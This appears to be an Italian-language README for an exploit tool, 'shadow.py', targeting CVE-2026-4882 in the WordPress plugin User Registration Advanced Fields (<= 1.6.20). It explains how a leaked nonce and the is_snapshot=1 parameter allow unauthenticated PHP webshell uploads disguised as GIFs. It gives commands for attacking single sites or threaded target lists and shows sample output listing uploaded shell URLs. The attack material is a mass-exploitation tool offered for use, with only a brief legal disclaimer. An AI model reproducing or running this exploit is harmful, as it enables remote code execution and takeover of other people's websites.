
User Registration Advanced Fields <= 1.6.20 - Caricamento Arbitrario di File non Autenticato
User Registration Advanced Fields <= 1.6.20 - Caricamento Arbitrario di File Non Autenticato
User Registration Advanced Fields <= 1.6.20 - Caricamento Arbitrario di File Non Autenticato
Il plugin User Registration Advanced Fields per WordPress (versioni fino alla 1.6.20 incluse) è vulnerabile al caricamento arbitrario di file non autenticato tramite l'azione AJAX uraf_profile_picture_upload_method_upload. Il plugin espone un nonce valido attraverso wp_localize_script() su qualsiasi pagina contenente un modulo di registrazione e, utilizzando il parametro is_snapshot=1, bypassa completamente la validazione dell'estensione del file. Ciò consente ad attaccanti non autenticati di caricare file arbitrari (ad esempio webshell PHP mascherate da immagini GIF), che vengono memorizzati in wp-content/uploads/user_registration_uploads/temp-uploads/, portando alla completa esecuzione di codice remoto (RCE).
~ Punteggio CVSS: 9.8 (Critico)
~ Versioni Affette: <= 1.6.20
Singolo target :
python3 shadow.py -u https://target.com -s shadow.phpTarget multipli :
python3 shadow.py -f targets.txt -s shadow.php -t 30Modalità interattiva :
python3 shadow.py
╔══════════════════════════════════════════════════╗
║ CVE-2026-4882 — Full Auto Exploit ║
║ User Registration Advanced Fields <= 1.6.20 ║
║ by: Shadow x Friska 😈🔥 ║
╚══════════════════════════════════════════════════╝
═══ Interactive Mode ═══
📄 Target file (e.g. targets.txt): list.txt
⚡ Threads 1-50 (default 30): 30
🎯 Targets : 75
📁 Shell : shadow.php
⚡ Threads : 30
💣 Brute : 1-500
🩷 [3/75] http://target.com
→ http://target.com/wp-content/uploads/user_registration_uploads/temp-uploads/shadow.php
💀 [1/75] http://example.com — no nonce
❌ [4/75] http://example2.com — upload failed
L'uso non autorizzato di sistemi che non possiedi o per i quali non hai il permesso di testare è illegale.